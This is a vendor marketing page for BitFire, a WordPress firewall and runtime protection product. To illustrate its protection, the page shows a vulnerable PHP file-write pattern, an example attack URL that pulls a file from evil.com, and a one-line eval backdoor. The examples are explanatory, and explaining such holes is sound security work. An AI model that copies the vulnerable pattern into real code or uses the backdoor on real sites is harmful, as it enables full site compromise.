BitFire is a new approach to WordPress security that integrates the first Runtime Application Self Protection (RASP) available for WordPress.Start for free
Runtime Application Self Protection is a security sandbox for your entire website. A traditional WAF runs in front of your site, blocking or allowing traffic based on signatures which may or may not detect an attack. RASP runs between your website and the Operating System, preventing unauthorized database and filesystem changes.Install BitFire Free
* Free 5 min install. No Credit Card Required.
In addition to the standard protection offered by other WAF solutions, BitFire has 4 unique features that run behind your website, protecting your filesystem, database, and client web browsers seamlessly without signatures.
RASP write-locks your PHP files to prevent any attack from modifying your plugins or core files.
99% of hacks are automated, Network Authentication allows only known authorized bots, locking out hackers.
Prevent redirect and other browser attacks by enforcing only content from approved sites with auto CSP.
Complete your security posture with database protection, preventing back door accounts and other database malware.
BitFire's RASP runs between WordPress (or any PHP code) and your Operating System files. It is able to prevent the most serious security vulnerabilities from being exploited on your site. Consider the following vulnerability where a plugin is fetching a remote image and saving to the local website:
<?php $r = $_GET['remote_image']; // fetch remote image: $data = file_get_contents($image); // local file name = content_dir + original filename $filename = WP_CONTENT_DIR . basename($image); // save image for local use: 💀 file_put_contents($filename, $data);
<?php # 🔭 did you spot the vulnerability? ~~~~~~~ # The plugin forgot to ensure that the file is an image file: 💀 file_put_contents($filename, $data); # This vulnerability allows anyone to upload backdoor PHP code...~~
<?php # www.site.com/vulnerable?remote_image=http://evil.com/backdoor.php # backdoor.php: echo '🦠 <?php eval($_GET["x"]);\n'; ~~ # This "image" is a backdoor executing any PHP code ~~~~ 😧 ~~~~~ # Resulting in complete compromise of all website files and data! ~~~~~ 😵
<?php # BitFire protects vulnerable plugin code like this by # intercepting all file writes before they execute: 💀 file_put_contents($_GET['name'], $_GET['data']);~~~ # And preventing any writes to a PHP file by a non-administrator. ~~~💓~~~~💓~~~💓~~~ # Without any custom extensions, guaranteed ~~~🥂~~~~~~~~~~~~~~~~~~~~~~~~~~
Hackers often impersonate Internet bots like GoogleBot, etc. Other WAFs block bots by hoping they self-identify. Only BitFire authenticates bots source network to verify authentic traffic.
Every bot can be configured to Allow from Anywhere, Authenticated IP or Full Block and BitFire can learn custom or unknown bots so you stay completely covered.
Keep sensitive data secure with BitFire RASP database. Protect user login data, blog posts, product information and any other sensitive database information. BitFire can prevent the access or modification of any database component by un-authorized users regardless of any existing security vulnerability.
Full guaranteed protection in less than 2 milliseconds *
Protect yourself from 0-day threats with security processes not just signatures.
Full Customer Support
Support 7 days per week from USA based developers
Receive 1 hour free install tech support
24x7 Network Monitoring
All installs receive free automated system monitoring
WordPress Plugin Monitoring
Hourly plugin checks for the latest vulnerabilities keep your site up to date
Offsite Database Backups
Gigabytes of off site database backups with a single click
"We were completely unable to load our site after being hacked. The team at BitFire walked us through the entire install process, removed all the malware and fully protected all our sites. I'll never run a site without it again."
Your security should be connected and portable. BitFire connects with other sources to help you stay secure.
Send alerts and site information automatically in a channel with a simple plugin.
Stay on top of security with actionable security reports to make sure your site is up to date.
Recover an already hacked site and prevent custom attacks to WordPress core and plugins.
Connect directly to the REST HTTP API to pull the latest data and dynamically configure and integrate the firewall.
Easily connect with elastic search to save and report on real time blocked and allowed traffic.
Easily integrate BitFire into any PHP project including custom and homegrown applications.
We can help you solve web security.